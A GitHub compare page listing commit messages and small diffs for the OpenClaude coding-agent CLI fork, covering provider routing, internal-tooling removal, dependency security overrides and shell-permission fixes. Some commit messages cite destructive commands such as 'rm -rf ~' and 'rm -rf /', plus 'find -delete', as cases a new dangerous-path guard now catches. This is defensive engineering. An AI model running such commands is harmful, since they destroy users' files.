Compare commits

...

34 Commits

Author SHA1 Message Date
Kevin Codex
94de37d44f chore: release 0.1.8 2026-04-06 13:45:02 +08:00
Kevin Codex
3b3aca716d test: fix post-merge suite regressions (#419) 2026-04-06 13:32:05 +08:00
Juan Camilo Auriti
d5852ca73d fix: coalesce consecutive same-role messages for strict template models (#241)
Models served through Ollama/vLLM with strict Jinja templates (Devstral,
Mistral, etc.) enforce user↔assistant role alternation and reject
requests containing consecutive messages of the same role.

convertMessages() could produce consecutive user or assistant messages in
three scenarios: batched user input, text-only + tool_use assistant turns,
and tool result remainders followed by another user message.

Added a coalescing pass at the end of convertMessages() that merges
consecutive same-role messages (string concat or array concat), preserving
tool_calls on assistant messages. Tool and system messages are excluded
from coalescing as they have their own alternation rules.

Includes regression tests for both user and assistant coalescing.

Fixes #202
2026-04-06 06:47:11 +08:00
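The coalescing pass this commit describes can be sketched roughly as follows. This is a hedged illustration, not the fork's actual code: the `Msg` type and `coalesceMessages` name are hypothetical stand-ins for whatever `convertMessages()` really uses.

```typescript
type Msg = {
  role: "system" | "user" | "assistant" | "tool";
  content: string;
  tool_calls?: unknown[];
};

// Merge consecutive user/user or assistant/assistant messages so strict-template
// backends see alternating roles. System and tool messages pass through
// untouched, since they follow their own alternation rules.
function coalesceMessages(messages: Msg[]): Msg[] {
  const out: Msg[] = [];
  for (const msg of messages) {
    const prev = out[out.length - 1];
    const mergeable = msg.role === "user" || msg.role === "assistant";
    if (prev && mergeable && prev.role === msg.role) {
      // Concatenate content; preserve any tool_calls on the surviving message.
      prev.content = `${prev.content}\n${msg.content}`;
      if (msg.tool_calls) {
        prev.tool_calls = [...(prev.tool_calls ?? []), ...msg.tool_calls];
      }
    } else {
      out.push({ ...msg });
    }
  }
  return out;
}
```

The real implementation also handles array-valued content; string concatenation is shown here for brevity.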
Technomancer702
c534aa5771 Feature: Add local OpenAI-compatible model discovery to /model (#201)
* Add local OpenAI-compatible model discovery to /model

* Guard local OpenAI model discovery from Codex routing

* Preserve remote OpenAI Codex alias behavior
2026-04-06 06:46:06 +08:00
Juan Camilo Auriti
60d3d8961a fix: add missing o1-series and Ollama models to context window table (#250)
Models not in the lookup table fall through to a 200k default, causing
auto-compact to never trigger for models with smaller actual context
windows. Users hit hard context_window_exceeded errors instead.

Added to both context window and max output token tables:
- o1, o1-mini, o1-preview, o1-pro (OpenAI reasoning models)
- llama3.2:1b, qwen3:8b, codestral (common Ollama models)

Relates to #248
2026-04-06 06:39:24 +08:00
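The failure mode described above comes from a lookup-with-default pattern. A minimal sketch (table name, entries, and window sizes are illustrative, not the fork's actual values) shows why a missing entry silently disables auto-compact:

```typescript
// Models absent from the table fall back to a 200k default, so a model with
// a genuinely small window never crosses the auto-compact threshold before
// the API rejects the request with context_window_exceeded.
const CONTEXT_WINDOWS: Record<string, number> = {
  "o1": 200_000,
  "o1-mini": 128_000,
  "llama3.2:1b": 131_072,
  "codestral": 32_768,
};

function contextWindow(model: string): number {
  return CONTEXT_WINDOWS[model] ?? 200_000; // fallback hides small windows
}
```

The fix is simply to keep the table populated for every supported model; a safer long-term design might pick a conservative default instead of a generous one.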
Juan Camilo Auriti
3b9893b586 security: force lodash-es 4.18.0 for transitive dependencies (#242)
* security: force lodash-es 4.18.0 for transitive dependencies

PR #225 bumped the direct lodash-es dependency to 4.18.0, but
@anthropic-ai/sandbox-runtime still pulled lodash-es@4.17.23 via its
own ^4.17.23 range. The transitive copy was vulnerable to:

- HIGH: Code Injection via _.template (GHSA-r5fr-rjxr-66jc)
- MODERATE: Prototype Pollution via _.unset/_.omit (GHSA-f23m-r3pf-42rh)

Added overrides field in package.json to force all copies to 4.18.0.
bun audit now reports zero vulnerabilities.

* fix: use lodash-es 4.18.1 instead of deprecated 4.18.0

lodash-es 4.18.0 is explicitly deprecated by the maintainer with
the message "Bad release. Please use lodash-es@4.17.23 instead."
Updated both the direct dependency and the override to 4.18.1, which
is the latest non-deprecated release that patches the CVEs.
2026-04-06 06:37:40 +08:00
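The mechanism used here is npm's `overrides` field (also honored by Bun), which pins transitive dependency versions that a direct dependency bump cannot reach. A package.json fragment in the shape this commit describes (versions from the commit message; the real file has many more fields):

```json
{
  "dependencies": {
    "lodash-es": "4.18.1"
  },
  "overrides": {
    "lodash-es": "4.18.1"
  }
}
```

With the override in place, every copy of lodash-es in the tree resolves to 4.18.1, including the one pulled in via `@anthropic-ai/sandbox-runtime`'s `^4.17.23` range.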
Joe Tam
daf2c90b6d Fix duplicate marketplace plugin loading (#364)
Reproduction:
- Enable `frontend-design@claude-code-plugins`
- Enable `frontend-design@claude-plugins-official`
- Start OpenClaude with both marketplace plugins active
- Both plugins load, but downstream command and skill scopes key off the short plugin name, so both collapse to `frontend-design` and can interfere with interactive startup

Fix:
- Collapse duplicate marketplace plugins by short name during merge
- Keep the enabled copy when enabled state differs; otherwise keep the later config entry
- Add regression coverage for both cases
2026-04-06 06:36:45 +08:00
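The merge rule in the fix section can be condensed into a small dedupe pass. This is an illustrative sketch only; the `Plugin` shape and function name are hypothetical:

```typescript
type Plugin = { shortName: string; marketplace: string; enabled: boolean };

// Collapse marketplace plugins by short name: prefer the enabled copy when
// enabled state differs, otherwise let the later config entry win.
function dedupeByShortName(plugins: Plugin[]): Plugin[] {
  const byName = new Map<string, Plugin>();
  for (const plugin of plugins) {
    const existing = byName.get(plugin.shortName);
    if (!existing || plugin.enabled || !existing.enabled) {
      byName.set(plugin.shortName, plugin);
    }
  }
  return [...byName.values()];
}
```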
CRABHIVE
4ac7367733 fix: include retry timing in 429 error messages (#366)
## Summary

- Extract retry-after header from 429 API errors and include timing
  guidance in the user-facing error message
- Previously, non-quota 429 errors showed a generic message with no
  guidance on when to retry, only a link to status.anthropic.com

## Impact

- user-facing impact: 429 error messages now tell users when to retry
  instead of just linking to a status page
- developer/maintainer impact: none

## Testing

- [x] `bun run build`
- [ ] `bun run smoke`
- [ ] focused tests: error formatting is pure string construction,
  verified via build + manual inspection

## Notes

- provider/model path tested: applies to all providers returning 429
- screenshots attached (if UI changed): n/a
- follow-up work or known limitations: 529 errors could get similar
  treatment in a follow-up

https://claude.ai/code/session_01D7kprMn4c66a5WrZscF7rv

Co-authored-by: Claude <noreply@anthropic.com>
2026-04-06 06:36:14 +08:00
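The header-extraction step described in the summary can be sketched as below. The function name is hypothetical, and the real formatter almost certainly builds a richer message; this only shows the Retry-After handling:

```typescript
// Surface the Retry-After header in the 429 message instead of only linking
// to a status page. Retry-After may be a delay in seconds or an HTTP date;
// only the numeric form is handled in this sketch.
function format429Message(headers: Headers): string {
  const retryAfter = headers.get("retry-after");
  const seconds = retryAfter ? Number.parseInt(retryAfter, 10) : Number.NaN;
  if (Number.isFinite(seconds) && seconds > 0) {
    return `Rate limited (429). Retry in about ${seconds}s.`;
  }
  return "Rate limited (429). Please retry shortly.";
}
```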
Kevin Codex
7350a798cb Feature/pr intent scan hardening (#375)
* security: harden suspicious PR intent scanner

* security: reduce pr scanner false positives
2026-04-05 17:05:24 +08:00
Kevin Codex
5ef79546e9 test: stabilize suite and add coverage heatmap (#373)
* test: stabilize suite and add coverage heatmap

* ci: run full bun test suite in pr checks
2026-04-05 12:44:54 +08:00
Anandan
daa3aa27a0 Remove internal-only bundled skills and mock helpers (#376)
* Remove internal-only bundled skills and mock rate-limit behavior

This takes the next planned Phase C-lite slice by deleting bundled skills
that only ever registered for internal users and replacing the internal
mock rate-limit helper with a stable no-op external stub. The external
build keeps the same behavior while removing a concentrated block of
USER_TYPE-gated dead code.

Constraint: Limit this PR to isolated internal-only helpers and avoid bridge, oauth, or rebrand behavior
Rejected: Broad USER_TYPE cleanup across mixed runtime surfaces | too risky for the next medium-sized PR
Confidence: high
Scope-risk: moderate
Reversibility: clean
Directive: The next cleanup pass should continue with similarly isolated USER_TYPE helpers before touching main.tsx or protocol-heavy code
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

* Align internal-only helper removal with remaining user guidance

This follow-up fixes the mock billing stub to be a true no-op and removes
stale user-facing references to /verify and /skillify from the same PR.
It also leaves a clearer paper trail for review: the deleted verify skill
was explicitly ant-gated before removal, and the remaining mock helper
callers still resolve to safe no-op returns in the external build.

Constraint: Keep the PR focused on consistency fixes and reviewer-requested evidence, not new cleanup scope
Rejected: Leave stale guidance for a later PR | would make this branch internally inconsistent after skill removal
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: When deleting gated features, always sweep user guidance and coordinator prompts in the same pass
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy; changed-file scan still shows only pre-existing tipRegistry errors outside edited lines)

* Clarify generic workflow wording after skill removal

This removes the last generic verification-skill wording that could still
be read as pointing at a deleted bundled command. The guidance now talks
about project workflows rather than a specific bundled verify skill.

Constraint: Keep the follow-up limited to reviewer-facing wording cleanup on the same PR
Rejected: Leave generic wording as-is | still too easy to misread after the explicit /verify references were removed
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: When removing bundled commands, scrub both explicit and generic references in the same branch
Tested: bun run build
Tested: bun run smoke
Not-tested: Additional checks unchanged by wording-only follow-up

---------

Co-authored-by: anandh8x <test@example.com>
2026-04-05 12:44:21 +08:00
Anandan
5ff34283c4 Stub internal-only recording and model capability helpers (#377)
This follow-up Phase C-lite slice replaces purely internal helper modules
with stable external no-op surfaces and collapses internal elevated error
logging to a no-op. The change removes additional USER_TYPE-gated helper
behavior without touching product-facing runtime flows.

Constraint: Keep this PR limited to isolated helper modules that are already external no-ops in practice
Rejected: Pulling in broader speculation or logging sink changes | less isolated and easier to debate during review
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Continue Phase C with similarly isolated helpers before moving into mixed behavior files
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-05 12:44:03 +08:00
Kevin Codex
d1a2df2f69 feat: activate buddy system in open build (#346) 2026-04-05 05:39:00 +08:00
Anandan
ba1b9913aa Finish eliminating remaining ANT-ONLY source labels (#360)
This extends the label-only cleanup to the remaining internal-only command,
debug, and heading strings so the source tree no longer contains ANT-ONLY
markers. The pass still avoids logic changes and only renames labels shown
in internal or gated surfaces.

Constraint: Update the existing label-cleanup PR without widening scope into behavior changes
Rejected: Leave the last ANT-ONLY strings for a later pass | low-cost cleanup while the branch is already focused on labels
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: The next phase should move off label cleanup and onto a separately scoped logic or rebrand slice
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:58:34 +05:30
Anandan
0d27ca596a Neutralize remaining internal-only diagnostic labels (#359)
This pass rewrites a small set of ant-only diagnostic and UI labels to
neutral internal wording while leaving command definitions, flags, and
runtime logic untouched. It focuses on internal debug output, dead UI
branches, and noninteractive headings rather than broader product text.

Constraint: Label cleanup only; do not change command semantics or ant-only logic gates
Rejected: Renaming ant-only command descriptions in main.tsx | broader UX surface better handled in a separate reviewed pass
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Remaining ANT-ONLY hits are mostly command descriptions and intentionally deferred user-facing strings
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:50:15 +05:30
Anandan
8fc40ee8c4 Neutralize internal Anthropic prose in explanatory comments (#357)
This is a small prose-only follow-up that rewrites clearly internal or
explanatory Anthropic comment language to neutral wording in a handful of
high-confidence files. It avoids runtime strings, flags, command labels,
protocol identifiers, and provider-facing references.

Constraint: Keep this pass narrowly scoped to comments/documentation only
Rejected: Broader Anthropic comment sweep across functional API/protocol references | too ambiguous for a safe prose-only PR
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Leave functional Anthropic references (API behavior, SDKs, URLs, provider labels, protocol docs) for separate reviewed passes
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:35:03 +05:30
Anandan
2f162af60c Reduce internal-only labeling noise in source comments (#355)
This pass rewrites comment-only ANT-ONLY markers to neutral internal-only
language across the source tree without changing runtime strings, flags,
commands, or protocol identifiers. The goal is to lower obvious internal
prose leakage while keeping the diff mechanically safe and easy to review.

Constraint: Phase B is limited to comments/prose only; runtime strings and user-facing labels remain deferred
Rejected: Broad search-and-replace across strings and command descriptions | too risky for a prose-only pass
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: Remaining ANT-ONLY hits are mostly runtime/user-facing strings and should be handled separately from comment cleanup
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (upstream baseline remains noisy)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:26:14 +05:30
Anandan
9e84d2fddc Remove internal-only tooling from the external build (#352)
* Remove internal-only tooling without changing external runtime contracts

This trims the lowest-risk internal-only surfaces first: deleted internal
modules are replaced by build-time no-op stubs, the bundled stuck skill is
removed, and the insights S3 upload path now stays local-only. The privacy
verifier is expanded and the remaining bundled internal Slack/Artifactory
strings are neutralized without broad repo-wide renames.

Constraint: Keep the first PR deletion-heavy and avoid mass rewrites of USER_TYPE, tengu, or claude_code identifiers
Rejected: One-shot DMCA cleanup branch | too much semantic risk for a first PR
Confidence: medium
Scope-risk: moderate
Reversibility: clean
Directive: Treat full-repo typecheck as a baseline issue on this upstream snapshot; do not claim this commit introduced the existing non-Phase-A errors without isolating them first
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Not-tested: Full repo typecheck (currently fails on widespread pre-existing upstream errors outside this change set)

* Keep minimal source shims so CI can import Phase A cleanup paths

The first PR removed internal-only source files entirely, but CI provider
and context tests import those modules directly from source rather than
through the build-time no-telemetry stubs. This restores tiny no-op source
shims so tests and local source imports resolve while preserving the same
external runtime behavior.

Constraint: GitHub Actions runs source-level tests in addition to bundled build/privacy checks
Rejected: Revert the entire deletion pass | unnecessary once the import contract is satisfied by small shims
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: For later cleanup phases, treat build-time stubs and source-test imports as separate compatibility surfaces
Tested: bun run build
Tested: bun run smoke
Tested: bun run verify:privacy
Tested: bun run test:provider
Tested: bun run test:provider-recommendation
Not-tested: Full repo typecheck (still noisy on this upstream snapshot)

---------

Co-authored-by: anandh8x <test@example.com>
2026-04-04 23:04:34 +05:30
KRATOS
75d2543854 fix: remove internal Anthropic tooling from external build (#345)
Remove debug systems, employee detection, and internal logging
that have no function in a community fork.

Changes:
- Remove logPermissionContextForAnts import and calls (main.tsx, compact.ts)
  Reads Kubernetes namespace and container IDs from internal infra paths.
  Dead code for all external users.

- Remove createDumpPromptsFetch import and gate (query.ts)
  Internal prompt dump system for employee debugging.
  Replace gate with unconditional undefined — normal fetch always used.

- Remove stripSignatureBlocks ant-only block (query.ts)
  Was behind USER_TYPE === 'ant' guard, never ran for external users.

- Hardcode isAnt: false (query/config.ts)
  Employee detection flag has no place in a community fork.
  config.gates.isAnt had exactly one consumer (dumpPromptsFetch, now removed).

- Gut logClassifierResultForAnts body (bashPermissions.ts)
  Replace with empty no-op. Still called from 4 sites, zero execution.
  Remove ANT-ONLY comments describing internal security model.

- Gate status.anthropic.com behind firstParty check (errors.ts)
  429 error hint now only shown when using Anthropic directly.
  Third-party provider users see a generic capacity message.

Build: passes
Typecheck: clean (no new errors)
Tests: 196 pass, same 6 pre-existing failures unrelated to these changes
2026-04-04 21:23:17 +05:30
KRATOS
01acc4c10e fix: auto-allow safe read-only commands in acceptEdits mode (#341)
* fix: auto-allow safe read-only commands in acceptEdits mode

In acceptEdits mode, read-only commands like grep, cat, ls, find, head,
tail were still prompting for approval. This created unnecessary friction
since these commands cannot modify or delete files.

Add safe read-only commands to ACCEPT_EDITS_ALLOWED_COMMANDS:
  grep, cat, ls, find, head, tail, echo, pwd, wc, sort, uniq, diff

These are all read-only — they cannot cause data loss or modify the
filesystem. Auto-allowing them reduces approval fatigue in acceptEdits
mode without introducing any safety risk.

Write commands (rm, rmdir, mv, cp, sed, mkdir, touch) are unchanged.
The dangerous path guard for rm/rmdir remains in place.

Fixes #251.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* fix(bash): block unsafe acceptEdits auto-allow

Keep the new read-only acceptEdits commands behind the existing read-only validator and block shell redirection based on the original command text. This prevents commands like echo > file and find -delete from being silently auto-approved while preserving safe read-only commands.

Co-Authored-By: Claude <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-04 22:53:09 +08:00
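Taken together, the two commits above amount to an allowlist plus a raw-text guard. A condensed sketch under those assumptions (names and the exact guard patterns are hypothetical; the real validator is more thorough):

```typescript
const READ_ONLY_COMMANDS = new Set([
  "grep", "cat", "ls", "find", "head", "tail",
  "echo", "pwd", "wc", "sort", "uniq", "diff",
]);

// Auto-allow only listed commands, and only when the original command text
// contains no redirection/chaining and no write-capable flags, so
// `echo hi > file` and `find . -delete` still prompt for approval.
function autoAllowInAcceptEdits(command: string): boolean {
  const name = command.trim().split(/\s+/)[0] ?? "";
  if (!READ_ONLY_COMMANDS.has(name)) return false;
  if (/[><|;&]/.test(command)) return false;
  if (name === "find" && /\s-delete\b/.test(command)) return false;
  return true;
}
```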
JiayuWang(王嘉宇)
e4cf810e14 fix: guard rawBaseUrl against the literal string "undefined" from env vars (#340)
On Windows, shells can set OPENAI_BASE_URL to the literal string
"undefined" when the variable is referenced without quotes while unset.
The nullish-coalescing operator (??) does not catch this because
"undefined" is a truthy string, causing resolveProviderRequest() to
treat it as a real base URL. This broke the Codex transport check:
(!rawBaseUrl && isCodexAlias(model)) evaluated as (false && true) = false
so the transport was incorrectly set to chat_completions (issue #336).

Fix: introduce asEnvUrl() which trims the value and rejects both empty
strings and the sentinel string "undefined". Use it for all three
rawBaseUrl sources (options.baseUrl, OPENAI_BASE_URL, OPENAI_API_BASE).

Tests: add three new cases to the 'Codex provider config' describe block
covering the empty-string, "undefined"-string, and options-override
scenarios. Also add beforeEach/afterEach guards so individual tests
cannot contaminate each other via env var state.

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-04 22:37:59 +08:00
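The guard behaves as the commit describes; a sketch consistent with that description (the exact implementation may differ):

```typescript
// Reject empty strings and the literal "undefined" that Windows shells can
// leave behind when an unset env var is referenced without quotes.
function asEnvUrl(value: string | undefined): string | undefined {
  const trimmed = value?.trim();
  if (!trimmed || trimmed === "undefined") return undefined;
  return trimmed;
}

// All three rawBaseUrl sources flow through the same guard, e.g.
// asEnvUrl(options.baseUrl) ?? asEnvUrl(env.OPENAI_BASE_URL) ?? asEnvUrl(env.OPENAI_API_BASE)
```

Because the guard returns `undefined` rather than an empty string, the existing `??` chains and `!rawBaseUrl` checks downstream behave correctly again.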
KRATOS
0951c8bc59 fix: run dangerous path check before auto-allowing rm/rmdir in acceptEdits mode (#246)
In acceptEdits mode, filesystem commands (rm, rmdir, mv, cp, sed, mkdir,
touch) were returned as 'allow' before checkDangerousRemovalPaths ran.
This meant rm -rf ~ and rm -rf / bypassed the dangerous path guard entirely.

Fix:
- Export checkDangerousRemovalPaths from pathValidation.ts
- In modeValidation.ts, call it for rm/rmdir before returning allow
- Safe paths (rm file.txt) continue to auto-allow unchanged
- Dangerous paths (rm -rf ~) now return 'ask' requiring user approval

This is a defense-in-depth guard that matters most for 3P models (local
Ollama, DeepSeek etc.) that lack built-in refusal training and would
blindly execute destructive commands in acceptEdits mode.

Fixes finding 3 from issue #244.

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-04 19:32:02 +05:30
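The ordering fix can be illustrated with a toy decision function. Everything here is a rough stand-in: the real `checkDangerousRemovalPaths` does proper path analysis, while this sketch only recognizes a few obviously destructive targets.

```typescript
type Decision = "allow" | "ask";

// Rough stand-in for the real path analysis: treat removals whose target is
// the filesystem root or the home directory as dangerous.
function isDangerousRemoval(command: string): boolean {
  const parts = command.trim().split(/\s+/);
  if (parts[0] !== "rm" && parts[0] !== "rmdir") return false;
  const targets = parts.slice(1).filter((p) => !p.startsWith("-"));
  return targets.some((t) => t === "/" || t === "/*" || t === "~" || t === "$HOME");
}

function acceptEditsDecision(command: string): Decision {
  const name = command.trim().split(/\s+/)[0] ?? "";
  const fsCommands = ["rm", "rmdir", "mv", "cp", "sed", "mkdir", "touch"];
  if (!fsCommands.includes(name)) return "ask";
  // The fix: the dangerous-path check now runs BEFORE the auto-allow return.
  if (isDangerousRemoval(command)) return "ask";
  return "allow";
}
```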
Vasanth T
4c3118e071 fix: harden execFileNoThrow for CodeQL (#338) 2026-04-04 21:39:54 +08:00
Vasanth T
80a2f1414c docs: organize Python helpers and refresh README (#334)
* docs: organize Python helpers and refresh README

* docs: add README status badges

* test: centralize Python helper test imports

* docs: add short provenance disclaimer
2026-04-04 21:24:36 +08:00
Anandan
462a985d7e Remove embedded source map directives from tracked sources (#329)
Inline base64 source maps had been checked into tracked src files. This strips those comments from the repository without changing runtime behavior or adding ongoing guardrails, per the requested one-time cleanup scope.

Constraint: Keep this change limited to tracked source cleanup only
Rejected: Add CI/source verification guard | user requested one-time cleanup only
Confidence: high
Scope-risk: narrow
Reversibility: clean
Directive: If these directives reappear, fix the producing transform instead of reintroducing repo-side cleanup code
Tested: rg -n "sourceMappingURL" ., bun run smoke, bun run verify:privacy, bun run test:provider, npm run test:provider-recommendation
Not-tested: bun run typecheck (repository has many pre-existing unrelated failures)

Co-authored-by: anandh8x <test@example.com>
2026-04-04 21:19:27 +08:00
Agent_J
ef881b247f feat(provider): align provider and model workflows (#324)
* feat(provider): align provider and model workflows

* fix(provider): clear gemini/github flags and use local ollama default

* fix(provider): preserve explicit startup provider selection

* fix(provider): clear env when deleting last profile

* chore(provider): apply review nits in ProviderManager

* fix(provider): preserve explicit env on last-profile delete

* fix(provider): preserve explicit env when profile marker is stale

---------

Co-authored-by: Gitlawb <gitlawb@users.noreply.github.com>
2026-04-04 20:29:45 +08:00
Vasanth T
a0bdab24c0 fix: address remaining CodeQL alerts (#332) 2026-04-04 20:28:35 +08:00
KRATOS
cdc92d16e4 fix(repl): queue prompt guidance for next turn (#333)
Keep normal prompt submissions during generation queued instead of interrupting the current turn. Add a visible next-turn banner in the prompt area so users can tell their follow-up guidance was accepted, and cover the new behavior with focused tests.

Fixes #328

Co-authored-by: Claude <noreply@anthropic.com>
2026-04-04 20:27:59 +08:00
Juan Camilo Auriti
fbf3385395 fix: prevent cross-provider model env var leaks and sync Codex detection (#243)
Two provider routing bugs that cause silent wrong-model failures:

1. model.ts: getUserSpecifiedModelSetting() read ANTHROPIC_MODEL ||
   GEMINI_MODEL || OPENAI_MODEL with no provider check. A user
   switching from Anthropic to OpenAI with ANTHROPIC_MODEL still set
   would silently send the Anthropic model name to the OpenAI API.
   Now gates each env var behind the active provider from
   getAPIProvider().

2. providers.ts: isCodexModel() maintained a hardcoded list of 8 model
   names that was missing gpt-5.4-mini and gpt-5.2 from the canonical
   CODEX_ALIAS_MODELS table in providerConfig.ts. This caused a
   split-brain: getAPIProvider() returned 'openai' while
   resolveProviderRequest() selected 'codex_responses' transport.
   Now delegates to the exported isCodexAlias() to keep both detection
   systems in sync.
2026-04-04 17:38:47 +08:00
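Bug 1's fix amounts to selecting the env var by active provider instead of chaining them with `||`. A sketch under that reading (the `Provider` union and function name are hypothetical):

```typescript
type Provider = "anthropic" | "gemini" | "openai";

// Only read the model env var that matches the active provider, so a stale
// ANTHROPIC_MODEL cannot leak into an OpenAI request.
function userSpecifiedModel(
  provider: Provider,
  env: Record<string, string | undefined>,
): string | undefined {
  switch (provider) {
    case "anthropic": return env.ANTHROPIC_MODEL;
    case "gemini": return env.GEMINI_MODEL;
    case "openai": return env.OPENAI_MODEL;
  }
}
```

Bug 2's fix is the complementary pattern: delete the duplicated model list and delegate to the single exported `isCodexAlias()` so both detection paths read one table.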
Vasanth T
ea335aeddc feat: add Gemini ADC and access token auth (#312)
* feat: add Gemini ADC and access token auth

* feat: add Gemini token and ADC provider setup

* feat: add Gemini token and ADC provider setup

* fix: honor Gemini auth mode on restart
2026-04-04 17:37:17 +08:00
RUO
280c9732f5 feat: fix open-source build and add Ollama model picker (#302)
* feat: fix open-source build and add Ollama model picker

- Fix build failures by stubbing 62+ missing Anthropic-internal modules
  with a catch-all plugin in scripts/build.ts
- Add runtime shim exports (isReplBridgeActive, getReplBridgeHandle) in
  bootstrap/state.ts for feature-gated code references
- Add /model picker support for Ollama: fetches available models from
  Ollama server at startup and displays them in the model selection menu
- Add Ollama model validation against cached server model list

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: address PR review feedback for Ollama integration

- Move Ollama validation before enterprise allowlist check in validateModel
- Truncate model list in error messages to first 5 entries
- Fix isOllamaProvider() to detect OLLAMA_BASE_URL-only configurations
- Reuse getOllamaApiBaseUrl() from providerDiscovery instead of duplicating
- Reset fetchPromise on failure to allow retry in prefetchOllamaModels
- Include Default option in Ollama model picker, prevent Claude model fallthrough
- Add file existence check for src/tasks/ stubs in build script

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: use pre-scanned exact-match resolvers to avoid Bun bundler corruption

Bun's onResolve plugin corrupts the module graph even when returning null
for non-matching imports. This caused lodash-es memoize and zod's util
namespace to be incorrectly tree-shaken, producing runtime ReferenceErrors.

Replace all pattern-based onResolve hooks with a pre-build scan that
identifies missing modules upfront, then registers exact-match resolvers
only for confirmed missing imports. This avoids touching any valid module
resolution paths.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

* fix: move Ollama model prefetch outside startup throttle gate

prefetchOllamaModels() was inside the skipStartupPrefetches condition,
so it would be skipped on subsequent launches due to the bgRefresh
throttle timestamp. Ollama model fetch targets a local/remote server
and is fast & cheap, so it should always run at startup.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
2026-04-04 17:22:18 +08:00
KRATOS
08be5181ab fix: skip Anthropic preconnect for third-party providers (#309) 2026-04-04 17:21:18 +08:00
KRATOS
b4725c19e0 fix: skip Anthropic MCP registry fetch for third-party providers (#310) 2026-04-04 17:20:48 +08:00
pr0ln
3c2e80a1ae Fix TUI redraw artifacts in row-based views (#325)
Co-authored-by: pr0ln <pr0ln@pr0lnui-Macmini.local>
2026-04-04 17:19:31 +08:00
738 changed files with 6970 additions and 4732 deletions

View File

@@ -16,6 +16,8 @@ jobs:
     steps:
       - name: Check out repository
         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+        with:
+          fetch-depth: 0
       - name: Set up Node.js
         uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
@@ -33,6 +35,11 @@ jobs:
       - name: Smoke check
         run: bun run smoke
+      - name: Full unit test suite
+        run: bun test --max-concurrency=1
+      - name: Suspicious PR intent scan
+        run: bun run security:pr-scan -- --base ${{ github.event.pull_request.base.sha || 'origin/main' }}
       - name: Provider tests
         run: bun run test:provider

1
.gitignore vendored
View File

@@ -6,3 +6,4 @@ dist/
 !.env.example
 .openclaude-profile.json
 reports/
+coverage/

178
README.md
View File

@@ -1,33 +1,24 @@
# OpenClaude # OpenClaude
OpenClaude is an open-source coding-agent CLI that works with more than one model provider. OpenClaude is an open-source coding-agent CLI for cloud and local model providers.
Use OpenAI-compatible APIs, Gemini, GitHub Models, Codex, Ollama, Atomic Chat, and other supported backends while keeping the same terminal-first workflow: prompts, tools, agents, MCP, slash commands, and streaming output. Use OpenAI-compatible APIs, Gemini, GitHub Models, Codex, Ollama, Atomic Chat, and other supported backends while keeping one terminal-first workflow: prompts, tools, agents, MCP, slash commands, and streaming output.
[![PR Checks](https://github.com/Gitlawb/openclaude/actions/workflows/pr-checks.yml/badge.svg?branch=main)](https://github.com/Gitlawb/openclaude/actions/workflows/pr-checks.yml)
[![Release](https://img.shields.io/github/v/tag/Gitlawb/openclaude?label=release&color=0ea5e9)](https://github.com/Gitlawb/openclaude/tags)
[![Discussions](https://img.shields.io/badge/discussions-open-7c3aed)](https://github.com/Gitlawb/openclaude/discussions)
[![Security Policy](https://img.shields.io/badge/security-policy-0f766e)](SECURITY.md)
[![License](https://img.shields.io/badge/license-MIT-2563eb)](LICENSE)
[Quick Start](#quick-start) | [Setup Guides](#setup-guides) | [Providers](#supported-providers) | [Source Build](#source-build-and-local-development) | [VS Code Extension](#vs-code-extension) | [Community](#community)
## Why OpenClaude ## Why OpenClaude
- Use one CLI across cloud and local model providers - Use one CLI across cloud APIs and local model backends
- Save provider profiles inside the app with `/provider` - Save provider profiles inside the app with `/provider`
- Run locally with Ollama or Atomic Chat - Run with OpenAI-compatible services, Gemini, GitHub Models, Codex, Ollama, Atomic Chat, and other supported providers
- Keep core coding-agent workflows: bash, file tools, grep, glob, agents, tasks, MCP, and web tools - Keep coding-agent workflows in one place: bash, file tools, grep, glob, agents, tasks, MCP, and web tools
- Use the bundled VS Code extension for launch integration and theme support
